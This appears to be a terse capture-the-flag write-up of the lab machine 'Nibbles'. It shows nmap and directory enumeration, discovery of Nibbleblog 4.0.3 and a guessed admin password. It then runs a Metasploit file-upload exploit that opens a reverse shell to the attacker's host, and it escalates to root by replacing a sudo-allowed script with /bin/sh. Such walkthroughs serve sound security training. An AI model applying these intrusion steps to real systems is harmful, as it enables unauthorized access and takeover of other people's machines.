kali@kali:~$ nmap -sC -sV 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 10:09 EDT
Nmap scan report for 10.10.10.75
Host is up (0.16s latency).                                                                                                                         
Not shown: 998 closed ports                                                                                                                         
PORT   STATE SERVICE VERSION                                                                                                                        
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)                                                                   
| ssh-hostkey:                                                                                                                                      
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)                                                                                      
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)                                                                                     
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)                                                                                   
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                                                                                                 
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                        
|_http-title: Site doesn't have a title (text/html).                                                                                                
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel   




kali@kali:~$ sudo nmap -sU -sT -T4 --max-retries 0 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 10:10 EDT
Warning: 10.10.10.75 giving up on port because retransmission cap hit (0).
Warning: 10.10.10.75 giving up on port because retransmission cap hit (0).                                                                          
Nmap scan report for 10.10.10.75                                                                                                                    
Host is up (0.16s latency).                                                                                                                         
Not shown: 989 open|filtered ports, 753 closed ports, 256 filtered ports                                                                            
PORT   STATE SERVICE                                                                                                                                
22/tcp open  ssh                                                                                                                                    
80/tcp open  http     


gobuster or dirb doesn't really come back anything useful

/icons/ (Status: 403)
/server-status/ (Status: 403)


reading the source page of the / , we find out it's /nibbleblog

/content (Status: 301)
/themes (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/README (Status: 200)
/languages (Status: 301)


/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

search it
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                             | php/remote/38489.rb




/index.php (Status: 200)
/sitemap.php (Status: 200)
/content (Status: 301)
/themes (Status: 301)
/feed.php (Status: 200)
/admin (Status: 301)
/admin.php (Status: 200)
/plugins (Status: 301)
/install.php (Status: 200)
/update.php (Status: 200)
/README (Status: 200)
/languages (Status: 301)


go through them we did find the username
http://10.10.10.75/nibbleblog/content/private/users.xml
<user username="admin">

it's anti-bruteforce, 5 time will block us for a while, we have to  guess, the password is nibbles


then use that metaexploit now

msf5 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.21:4444 
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.21:4444 -> 10.10.10.75:47184) at 2020-07-18 11:47:46 -0400
[+] Deleted image.php


own user

sudo -l
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh


change that to 
cat monitor.sh
/bin/sh

sudo /home/nibbler/personal/stuff/monitor.sh

-r--------  1 root root   33 Dec 10  2017 root.txt



